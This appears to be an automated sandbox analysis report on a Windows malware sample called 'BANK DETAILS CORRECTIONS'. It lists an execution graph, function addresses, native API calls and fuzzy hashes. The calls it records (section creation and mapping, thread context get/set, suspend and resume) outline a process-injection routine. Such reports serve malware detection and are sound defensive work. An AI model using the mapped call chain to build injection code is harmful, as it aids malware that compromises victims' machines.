                                                                                    execution_graph 91739 42b983 91740 42b9fa 91739->91740 91741 42b9a1 91739->91741 91744 40b493 91741->91744 91743 42b9f3 91747 40b4b8 91744->91747 91745 40b5d5 NtCreateFile 91746 40b614 91745->91746 91746->91743 91747->91745 91748 4255a3 91752 4255b2 91748->91752 91749 425639 91750 4255f6 91756 42da33 91750->91756 91752->91749 91752->91750 91754 425634 91752->91754 91755 42da33 RtlFreeHeap 91754->91755 91755->91749 91759 42bef3 91756->91759 91758 425603 91760 42bf0d 91759->91760 91761 42bf1b RtlFreeHeap 91760->91761 91761->91758 91993 425213 91994 42522f 91993->91994 91995 425257 91994->91995 91996 42526b 91994->91996 91997 42bbf3 NtClose 91995->91997 91998 42bbf3 NtClose 91996->91998 91999 425260 91997->91999 92000 425274 91998->92000 92003 42db53 RtlAllocateHeap 92000->92003 92002 42527f 92003->92002 92004 42eb13 92005 42eb23 92004->92005 92006 42eb29 92004->92006 92009 42db13 92006->92009 92008 42eb4f 92012 42bea3 92009->92012 92011 42db2e 92011->92008 92013 42bec0 92012->92013 92014 42bece RtlAllocateHeap 92013->92014 92014->92011 92015 42b333 92016 42b350 92015->92016 92019 1962df0 LdrInitializeThunk 92016->92019 92017 42b375 92019->92017 92020 42bab3 92021 42bad1 92020->92021 92022 42bb22 92020->92022 92025 40b6c3 92021->92025 92024 42bb1b 92028 40b6e8 92025->92028 92026 40b805 NtReadFile 92027 40b83c 92026->92027 92027->92024 92028->92026 91762 415403 91763 41540a 91762->91763 91768 418c03 91763->91768 91765 41543b 91766 415480 91765->91766 91767 41546f PostThreadMessageW 91765->91767 91767->91766 91770 418c27 91768->91770 91769 418c2e 91769->91765 91770->91769 91771 418c4d 91770->91771 91775 42eef3 LdrLoadDll 91770->91775 91773 418c63 LdrLoadDll 91771->91773 91774 418c7a 91771->91774 91773->91774 91774->91765 91775->91771 91776 41be83 91777 41bec7 91776->91777 91782 41bee8 91777->91782 91783 42b113 91777->91783 91779 41bed8 91780 41bef4 91779->91780 91788 42bbf3 91779->91788 91784 42b131 91783->91784 91785 42b166 91783->91785 91791 40a5f3 91784->91791 91785->91779 91787 42b15f 91787->91779 91789 42bc0d 91788->91789 91790 42bc1b NtClose 91789->91790 91790->91782 91794 40a618 91791->91794 91792 40a735 NtSuspendThread 91793 40a750 91792->91793 91793->91787 91794->91792 92029 41eed3 92031 41eef9 92029->92031 92030 41f2c0 92031->92030 92032 41f2a8 92031->92032 92066 42ec43 92031->92066 92034 42da33 RtlFreeHeap 92032->92034 92034->92030 92035 41efbd 92035->92032 92036 41f0c3 92035->92036 92037 42b383 LdrInitializeThunk 92035->92037 92072 419f23 LdrInitializeThunk 92036->92072 92038 41f044 92037->92038 92038->92036 92043 41f04c 92038->92043 92040 41f0ee 92040->92032 92045 41f123 92040->92045 92075 419e23 NtMapViewOfSection 92040->92075 92041 41f0a9 92042 42da33 RtlFreeHeap 92041->92042 92048 41f0b9 92042->92048 92043->92030 92043->92041 92044 41f07b 92043->92044 92073 419e23 NtMapViewOfSection 92043->92073 92047 42bbf3 NtClose 92044->92047 92052 41f287 92045->92052 92055 41f150 92045->92055 92050 41f08b 92047->92050 92074 427c23 NtDelayExecution 92050->92074 92053 42da33 RtlFreeHeap 92052->92053 92054 41f29e 92053->92054 92056 41bd33 2 API calls 92055->92056 92057 41f1d8 92056->92057 92057->92032 92058 41f1e3 92057->92058 92059 42da33 RtlFreeHeap 92058->92059 92060 41f207 92059->92060 92061 42b523 NtMapViewOfSection 92060->92061 92063 41f242 92061->92063 92062 41f249 92063->92062 92064 42b193 NtResumeThread 92063->92064 92065 41f27d 92064->92065 92067 42ebb3 92066->92067 92068 42ec10 92067->92068 92069 42db13 RtlAllocateHeap 92067->92069 92068->92035 92070 42ebed 92069->92070 92071 42da33 RtlFreeHeap 92070->92071 92071->92068 92072->92040 92073->92044 92074->92041 92075->92045 92076 1962b60 LdrInitializeThunk 92077 419df8 92078 42bbf3 NtClose 92077->92078 92079 419e02 92078->92079 91795 401a8e 91796 401a95 91795->91796 91799 42efd3 91796->91799 91802 42d633 91799->91802 91803 42d656 91802->91803 91814 407343 91803->91814 91805 42d66c 91813 401bcc 91805->91813 91817 41bc93 91805->91817 91807 42d68b 91810 42d6a0 91807->91810 91832 42bf33 91807->91832 91828 4284d3 91810->91828 91811 42d6af 91812 42bf33 ExitProcess 91811->91812 91812->91813 91835 417ab3 91814->91835 91816 407350 91816->91805 91818 41bcbf 91817->91818 91853 41bb83 91818->91853 91821 41bd04 91824 41bd20 91821->91824 91826 42bbf3 NtClose 91821->91826 91822 41bcec 91823 41bcf7 91822->91823 91825 42bbf3 NtClose 91822->91825 91823->91807 91824->91807 91825->91823 91827 41bd16 91826->91827 91827->91807 91829 42852d 91828->91829 91830 42853a 91829->91830 91864 419743 91829->91864 91830->91811 91833 42bf50 91832->91833 91834 42bf61 ExitProcess 91833->91834 91834->91810 91837 417aca 91835->91837 91836 417ae0 91836->91816 91837->91836 91839 42c5d3 91837->91839 91841 42c5eb 91839->91841 91840 42c60f 91840->91836 91841->91840 91846 42b383 91841->91846 91844 42da33 RtlFreeHeap 91845 42c677 91844->91845 91845->91836 91847 42b3a0 91846->91847 91850 1962c0a 91847->91850 91848 42b3c9 91848->91844 91851 1962c11 91850->91851 91852 1962c1f LdrInitializeThunk 91850->91852 91851->91848 91852->91848 91854 41bc79 91853->91854 91855 41bb9d 91853->91855 91854->91821 91854->91822 91859 42b423 91855->91859 91858 42bbf3 NtClose 91858->91854 91860 42b440 91859->91860 91863 19635c0 LdrInitializeThunk 91860->91863 91861 41bc6d 91861->91858 91863->91861 91865 41976d 91864->91865 91889 419bdb 91865->91889 91890 424be3 91865->91890 91867 41980c 91867->91889 91893 415533 91867->91893 91869 41987a 91870 42da33 RtlFreeHeap 91869->91870 91869->91889 91872 419892 91870->91872 91871 4198c4 91877 4198cb 91871->91877 91903 41bd33 91871->91903 91872->91871 91899 406ec3 91872->91899 91874 419904 91874->91889 91910 42b523 91874->91910 91877->91889 91915 42b013 91877->91915 91879 419961 91920 42b093 91879->91920 91881 419981 91882 419b6a 91881->91882 91925 406f33 91881->91925 91885 419b8d 91882->91885 91933 42b193 91882->91933 91887 419baa 91885->91887 91929 41bf03 91885->91929 91888 42bf33 ExitProcess 91887->91888 91888->91889 91889->91830 91938 42d9a3 91890->91938 91892 424c04 91892->91867 91894 415552 91893->91894 91897 415599 91893->91897 91895 41bf03 NtDelayExecution 91894->91895 91896 415670 91894->91896 91894->91897 91895->91894 91896->91869 91897->91896 91950 414f83 91897->91950 91900 406ef3 91899->91900 91901 41bf03 NtDelayExecution 91900->91901 91902 406f14 91900->91902 91901->91900 91902->91871 91904 41bd50 91903->91904 91959 42b473 91904->91959 91906 41bda0 91907 41bda7 91906->91907 91908 42b523 NtMapViewOfSection 91906->91908 91907->91874 91909 41bdd0 91908->91909 91909->91874 91911 42b541 91910->91911 91912 42b596 91910->91912 91968 40b263 91911->91968 91912->91877 91914 42b58f 91914->91877 91916 42b034 91915->91916 91917 42b069 91915->91917 91972 40a803 91916->91972 91917->91879 91919 42b062 91919->91879 91921 42b0b1 91920->91921 91923 42b0e6 91920->91923 91976 40aa13 91921->91976 91923->91881 91924 42b0df 91924->91881 91928 406f48 91925->91928 91926 41bf03 NtDelayExecution 91926->91928 91927 406f73 91927->91882 91928->91926 91928->91927 91930 41bf16 91929->91930 91980 42b2b3 91930->91980 91932 41bf41 91932->91885 91934 42b1e9 91933->91934 91935 42b1b4 91933->91935 91934->91885 91989 40ac23 91935->91989 91937 42b1e2 91937->91885 91941 42bd23 91938->91941 91940 42d9d4 91940->91892 91942 42bd44 91941->91942 91943 42bd89 91941->91943 91946 40bf53 91942->91946 91943->91940 91945 42bd82 91945->91940 91949 40bf78 91946->91949 91947 40c095 NtAllocateVirtualMemory 91948 40c0c0 91947->91948 91948->91945 91949->91947 91951 414f9f 91950->91951 91954 42be13 91951->91954 91955 42be30 91954->91955 91958 1962c70 LdrInitializeThunk 91955->91958 91956 414fa5 91956->91896 91958->91956 91960 42b4dd 91959->91960 91961 42b494 91959->91961 91960->91906 91964 40b043 91961->91964 91963 42b4d6 91963->91906 91967 40b068 91964->91967 91965 40b185 NtCreateSection 91966 40b1b4 91965->91966 91966->91963 91967->91965 91971 40b288 91968->91971 91969 40b3a5 NtMapViewOfSection 91970 40b3e0 91969->91970 91970->91914 91971->91969 91975 40a828 91972->91975 91973 40a945 NtGetContextThread 91974 40a960 91973->91974 91974->91919 91975->91973 91977 40aa38 91976->91977 91978 40ab55 NtSetContextThread 91977->91978 91979 40ab70 91978->91979 91979->91924 91981 42b2d1 91980->91981 91982 42b306 91980->91982 91985 40bb33 91981->91985 91982->91932 91984 42b2ff 91984->91932 91987 40bb58 91985->91987 91986 40bc75 NtDelayExecution 91988 40bc91 91986->91988 91987->91986 91988->91984 91991 40ac48 91989->91991 91990 40ad65 NtResumeThread 91992 40ad80 91990->91992 91991->91990 91992->91937

                                                                                    Executed Functions

                                                                                    Function 0040AC23 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170nativethreadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • NtResumeThread.NTDLL(%q@,00000089,?,?,?), ref: 0040AD6D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID: %q@$%q@
                                                                                    • API String ID: 947044025-3377134125
                                                                                    • Opcode ID: aba5936b59ed8fcfc3ac4bf44cf08847aee2f62204b3cbefc77dd1437123ddaf
                                                                                    • Instruction ID: ee851f342668546faf2b0f66c948a1bc40674093a07c05680ac2c4caf6b44ec0
                                                                                    • Opcode Fuzzy Hash: aba5936b59ed8fcfc3ac4bf44cf08847aee2f62204b3cbefc77dd1437123ddaf
                                                                                    • Instruction Fuzzy Hash: 04717F71E04258DFCB05CFA9C490AEDBBF2BF49304F18806AE455B7381D638A952DF55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040B043 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 180nativeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 135 40b043-40b062 136 40b068-40b0a7 call 40a0a3 135->136 137 40b063 call 40a093 135->137 140 40b185-40b1ae NtCreateSection 136->140 141 40b0ad-40b0f2 call 40a133 call 42f052 call 40a003 call 42f052 136->141 137->136 142 40b1b4-40b1bb 140->142 143 40b24b-40b257 140->143 163 40b0fd-40b103 141->163 145 40b1c6-40b1cc 142->145 147 40b1f4-40b1f8 145->147 148 40b1ce-40b1f2 145->148 152 40b23a-40b248 call 40a133 147->152 153 40b1fa-40b201 147->153 148->145 152->143 155 40b20c-40b212 153->155 155->152 158 40b214-40b238 155->158 158->155 164 40b105-40b129 163->164 165 40b12b-40b12f 163->165 164->163 165->140 166 40b131-40b14c 165->166 168 40b157-40b15d 166->168 168->140 169 40b15f-40b183 168->169 169->168
                                                                                    APIs
                                                                                    • NtCreateSection.NTDLL(?,00000000,000F001F,?,?,Ap@,00000000,?,?,08000000), ref: 0040B1A1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateSection
                                                                                    • String ID: Ap@
                                                                                    • API String ID: 2449625523-3623487107
                                                                                    • Opcode ID: e5879d3cfbf2304aafbf97c9e634e03d3bed9e9ea54524e95573ce4af354e39a
                                                                                    • Instruction ID: 0381bab49cd4c8b4b5159a166a4b27d29b29071425fa3ca34d24dcdad5d17ccd
                                                                                    • Opcode Fuzzy Hash: e5879d3cfbf2304aafbf97c9e634e03d3bed9e9ea54524e95573ce4af354e39a
                                                                                    • Instruction Fuzzy Hash: 54711D71E04158DBCB05CFA9C890AEDBBF1BF49304F18816AE459BB341D734A942CF99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040B493 Relevance: 1.7, APIs: 1, Instructions: 188filenativeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 178 40b493-40b4f7 call 40a093 call 40a0a3 183 40b5d5-40b60e NtCreateFile 178->183 184 40b4fd-40b542 call 40a133 call 42f052 call 40a003 call 42f052 178->184 186 40b614-40b61b 183->186 187 40b6ab-40b6b7 183->187 206 40b54d-40b553 184->206 189 40b626-40b62c 186->189 191 40b654-40b658 189->191 192 40b62e-40b652 189->192 193 40b69a-40b6a8 call 40a133 191->193 194 40b65a-40b661 191->194 192->189 193->187 197 40b66c-40b672 194->197 197->193 200 40b674-40b698 197->200 200->197 207 40b555-40b579 206->207 208 40b57b-40b57f 206->208 207->206 208->183 209 40b581-40b59c 208->209 211 40b5a7-40b5ad 209->211 211->183 212 40b5af-40b5d3 211->212 212->211
                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(?,?,?,?,?,?,00000000,?,?,?,?), ref: 0040B601
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: b3859685d2cd249508ae90d2a5df4da341d02166a87b09ae450acdbf32f33dea
                                                                                    • Instruction ID: 11dc76d2ff46ad369f84af84ef416579dfba8aa7f4f7d5f825c12d343142f3b7
                                                                                    • Opcode Fuzzy Hash: b3859685d2cd249508ae90d2a5df4da341d02166a87b09ae450acdbf32f33dea
                                                                                    • Instruction Fuzzy Hash: C2813BB1E04158DFCB04CFA9C890AEDBBF5AF4D304F1881AAE459A7341D734A942CF99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040B263 Relevance: 1.7, APIs: 1, Instructions: 186nativeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 214 40b263-40b2c7 call 40a093 call 40a0a3 219 40b3a5-40b3da NtMapViewOfSection 214->219 220 40b2cd-40b312 call 40a133 call 42f052 call 40a003 call 42f052 214->220 222 40b3e0-40b3e7 219->222 223 40b477-40b483 219->223 242 40b31d-40b323 220->242 225 40b3f2-40b3f8 222->225 226 40b420-40b424 225->226 227 40b3fa-40b41e 225->227 231 40b466-40b474 call 40a133 226->231 232 40b426-40b42d 226->232 227->225 231->223 234 40b438-40b43e 232->234 234->231 237 40b440-40b464 234->237 237->234 243 40b325-40b349 242->243 244 40b34b-40b34f 242->244 243->242 244->219 246 40b351-40b36c 244->246 247 40b377-40b37d 246->247 247->219 248 40b37f-40b3a3 247->248 248->247
                                                                                    APIs
                                                                                    • NtMapViewOfSection.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00407084,?,?,?,00000000), ref: 0040B3CD
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: SectionView
                                                                                    • String ID:
                                                                                    • API String ID: 1323581903-0
                                                                                    • Opcode ID: 0866cf4b95f103e47141c3cf05aef34de53527172598e38c206646d317e0ed2b
                                                                                    • Instruction ID: 7815fb951351c9600068ff048e4789ad6ddc86b8868e2be42b241be52a63fafb
                                                                                    • Opcode Fuzzy Hash: 0866cf4b95f103e47141c3cf05aef34de53527172598e38c206646d317e0ed2b
                                                                                    • Instruction Fuzzy Hash: F0711AB1E04158DBCB04CFA9C490AEDBBF5BF49304F18816AE859A7345D638A942CF99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040B6C3 Relevance: 1.7, APIs: 1, Instructions: 184filenativeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 250 40b6c3-40b727 call 40a093 call 40a0a3 255 40b805-40b836 NtReadFile 250->255 256 40b72d-40b772 call 40a133 call 42f052 call 40a003 call 42f052 250->256 258 40b8d3-40b8df 255->258 259 40b83c-40b843 255->259 278 40b77d-40b783 256->278 261 40b84e-40b854 259->261 263 40b856-40b87a 261->263 264 40b87c-40b880 261->264 263->261 267 40b8c2-40b8d0 call 40a133 264->267 268 40b882-40b889 264->268 267->258 270 40b894-40b89a 268->270 270->267 274 40b89c-40b8c0 270->274 274->270 279 40b785-40b7a9 278->279 280 40b7ab-40b7af 278->280 279->278 280->255 281 40b7b1-40b7cc 280->281 283 40b7d7-40b7dd 281->283 283->255 284 40b7df-40b803 283->284 284->283
                                                                                    APIs
                                                                                    • NtReadFile.NTDLL(?,?,?,?,?,?,00000000,?,?), ref: 0040B829
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: dc765def1bd5507d76e0b79e000c2fca93ad6087eb27bfe579b98170dd7e6c15
                                                                                    • Instruction ID: 23ea5d1df1a36d78c489dbe9be50a4534a115f97f07db2c7e60c0155cc345583
                                                                                    • Opcode Fuzzy Hash: dc765def1bd5507d76e0b79e000c2fca93ad6087eb27bfe579b98170dd7e6c15
                                                                                    • Instruction Fuzzy Hash: D0713C71E04158DBCB04CFA9C490AEDBBF5BF49304F18816AE459B7351D734A942CF98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040BF53 Relevance: 1.7, APIs: 1, Instructions: 178memorynativeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 286 40bf53-40bf72 287 40bf78-40bfb7 call 40a0a3 286->287 288 40bf73 call 40a093 286->288 291 40c095-40c0ba NtAllocateVirtualMemory 287->291 292 40bfbd-40c002 call 40a133 call 42f052 call 40a003 call 42f052 287->292 288->287 293 40c0c0-40c0c7 291->293 294 40c157-40c163 291->294 314 40c00d-40c013 292->314 296 40c0d2-40c0d8 293->296 298 40c100-40c104 296->298 299 40c0da-40c0fe 296->299 303 40c146-40c154 call 40a133 298->303 304 40c106-40c10d 298->304 299->296 303->294 305 40c118-40c11e 304->305 305->303 308 40c120-40c144 305->308 308->305 315 40c015-40c039 314->315 316 40c03b-40c03f 314->316 315->314 316->291 317 40c041-40c05c 316->317 319 40c067-40c06d 317->319 319->291 320 40c06f-40c093 319->320 320->319
                                                                                    APIs
                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0040C0AD
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateMemoryVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2167126740-0
                                                                                    • Opcode ID: 74f5b944877f66db78025bd3e4938ec45131c11e63da4c866314f01efce51fb0
                                                                                    • Instruction ID: a4d7bfa13041059b49b11f8f6e344e758919433d6fe80d36613e7d55410698a1
                                                                                    • Opcode Fuzzy Hash: 74f5b944877f66db78025bd3e4938ec45131c11e63da4c866314f01efce51fb0
                                                                                    • Instruction Fuzzy Hash: 9C712C71E04158DFCB05CFA9C890AEDBBF1BF49304F18816AE459BB381D639A942CF95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040A803 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 358 40a803-40a822 359 40a828-40a867 call 40a0a3 358->359 360 40a823 call 40a093 358->360 363 40a945-40a95a NtGetContextThread 359->363 364 40a86d-40a8b2 call 40a133 call 42f052 call 40a003 call 42f052 359->364 360->359 365 40a960-40a967 363->365 366 40a9f7-40aa03 363->366 386 40a8bd-40a8c3 364->386 368 40a972-40a978 365->368 370 40a9a0-40a9a4 368->370 371 40a97a-40a99e 368->371 374 40a9e6-40a9f4 call 40a133 370->374 375 40a9a6-40a9ad 370->375 371->368 374->366 377 40a9b8-40a9be 375->377 377->374 380 40a9c0-40a9e4 377->380 380->377 387 40a8c5-40a8e9 386->387 388 40a8eb-40a8ef 386->388 387->386 388->363 390 40a8f1-40a90c 388->390 391 40a917-40a91d 390->391 391->363 392 40a91f-40a943 391->392 392->391
                                                                                    APIs
                                                                                    • NtGetContextThread.NTDLL(?,?), ref: 0040A94D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ContextThread
                                                                                    • String ID:
                                                                                    • API String ID: 1591575202-0
                                                                                    • Opcode ID: 3225c519f2516d18a3c0e030143c325659fdcde7e9fd1b19f1ea2b5a5356a634
                                                                                    • Instruction ID: 5a11b14fb5c226ef2517cc243eb130f814e1a6696c6d4c9390035bbedccb988b
                                                                                    • Opcode Fuzzy Hash: 3225c519f2516d18a3c0e030143c325659fdcde7e9fd1b19f1ea2b5a5356a634
                                                                                    • Instruction Fuzzy Hash: F5715FB1E04258DFCB04CFA9C490AEDBBF1BF49314F18806AE459B7381D638A952CF55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040AA13 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 394 40aa13-40aa77 call 40a093 call 40a0a3 399 40ab55-40ab6a NtSetContextThread 394->399 400 40aa7d-40aac2 call 40a133 call 42f052 call 40a003 call 42f052 394->400 402 40ab70-40ab77 399->402 403 40ac07-40ac13 399->403 422 40aacd-40aad3 400->422 405 40ab82-40ab88 402->405 406 40abb0-40abb4 405->406 407 40ab8a-40abae 405->407 410 40abf6-40ac04 call 40a133 406->410 411 40abb6-40abbd 406->411 407->405 410->403 413 40abc8-40abce 411->413 413->410 417 40abd0-40abf4 413->417 417->413 423 40aad5-40aaf9 422->423 424 40aafb-40aaff 422->424 423->422 424->399 426 40ab01-40ab1c 424->426 427 40ab27-40ab2d 426->427 427->399 428 40ab2f-40ab53 427->428 428->427
                                                                                    APIs
                                                                                    • NtSetContextThread.NTDLL(?,?), ref: 0040AB5D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ContextThread
                                                                                    • String ID:
                                                                                    • API String ID: 1591575202-0
                                                                                    • Opcode ID: 011570ddb7b065925eace56ea3ff63214166f04baa1dae47dd0756f52dee1737
                                                                                    • Instruction ID: 01d1d1ca2a9dcc4d3737307ec8090fca9c95f74e01fab84ae49ae576f4f644e2
                                                                                    • Opcode Fuzzy Hash: 011570ddb7b065925eace56ea3ff63214166f04baa1dae47dd0756f52dee1737
                                                                                    • Instruction Fuzzy Hash: 6E717170E04258DFCB04CFA9C490AEDBBF2BF49304F1881AAE459B7381D638A952CF55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040BB33 Relevance: 1.7, APIs: 1, Instructions: 170nativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtDelayExecution.NTDLL(0041BF41,00000089,?,?,00000000), ref: 0040BC7E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DelayExecution
                                                                                    • String ID:
                                                                                    • API String ID: 1249177460-0
                                                                                    • Opcode ID: 9eefccdc5a9b0cbf85704d06a39a1828bd053a4bea36f44141480640af2b7367
                                                                                    • Instruction ID: f6d0d2a850d2609eca22e7acb0f7eb6f9cb02f316128d4b7d2185fc13f9d3ffd
                                                                                    • Opcode Fuzzy Hash: 9eefccdc5a9b0cbf85704d06a39a1828bd053a4bea36f44141480640af2b7367
                                                                                    • Instruction Fuzzy Hash: 8A713B71D08258DBDB04CFA9C490AEDBBF1BF49304F1880AAE455B7381D738A942DF99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040A5F3 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 322 40a5f3-40a612 323 40a618-40a657 call 40a0a3 322->323 324 40a613 call 40a093 322->324 327 40a735-40a74a NtSuspendThread 323->327 328 40a65d-40a6a2 call 40a133 call 42f052 call 40a003 call 42f052 323->328 324->323 330 40a750-40a757 327->330 331 40a7e7-40a7f3 327->331 350 40a6ad-40a6b3 328->350 333 40a762-40a768 330->333 335 40a790-40a794 333->335 336 40a76a-40a78e 333->336 339 40a7d6-40a7e4 call 40a133 335->339 340 40a796-40a79d 335->340 336->333 339->331 343 40a7a8-40a7ae 340->343 343->339 346 40a7b0-40a7d4 343->346 346->343 351 40a6b5-40a6d9 350->351 352 40a6db-40a6df 350->352 351->350 352->327 353 40a6e1-40a6fc 352->353 355 40a707-40a70d 353->355 355->327 356 40a70f-40a733 355->356 356->355
                                                                                    APIs
                                                                                    • NtSuspendThread.NTDLL(?,?), ref: 0040A73D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: SuspendThread
                                                                                    • String ID:
                                                                                    • API String ID: 3178671153-0
                                                                                    • Opcode ID: d472e0894435b7cb11040e371dfd6c15ed46b6229c147a4e0a85cdd993f7feaa
                                                                                    • Instruction ID: 7b87983295c1975e573cccaea1807d253bc69fe9b50c9518089b1f42f66d1efa
                                                                                    • Opcode Fuzzy Hash: d472e0894435b7cb11040e371dfd6c15ed46b6229c147a4e0a85cdd993f7feaa
                                                                                    • Instruction Fuzzy Hash: 65717D75E04258DFCB04CFA9C490AEDBBF1BF49304F1880AAE459BB381D638A952DF55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00418C03 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00418C75
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_400000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0
                                                                                    • Opcode ID: 7b39c97d39e9569075fd7618efb5991768fd47f372a6003220b835332d61c085
                                                                                    • Instruction ID: 45e01bb4d54996271e004354ee7b3702c07220f7e15f66f0c16626fe8b1d8f71
                                                                                    • Opcode Fuzzy Hash: 7b39c97d39e9569075fd7618efb5991768fd47f372a6003220b835332d61c085
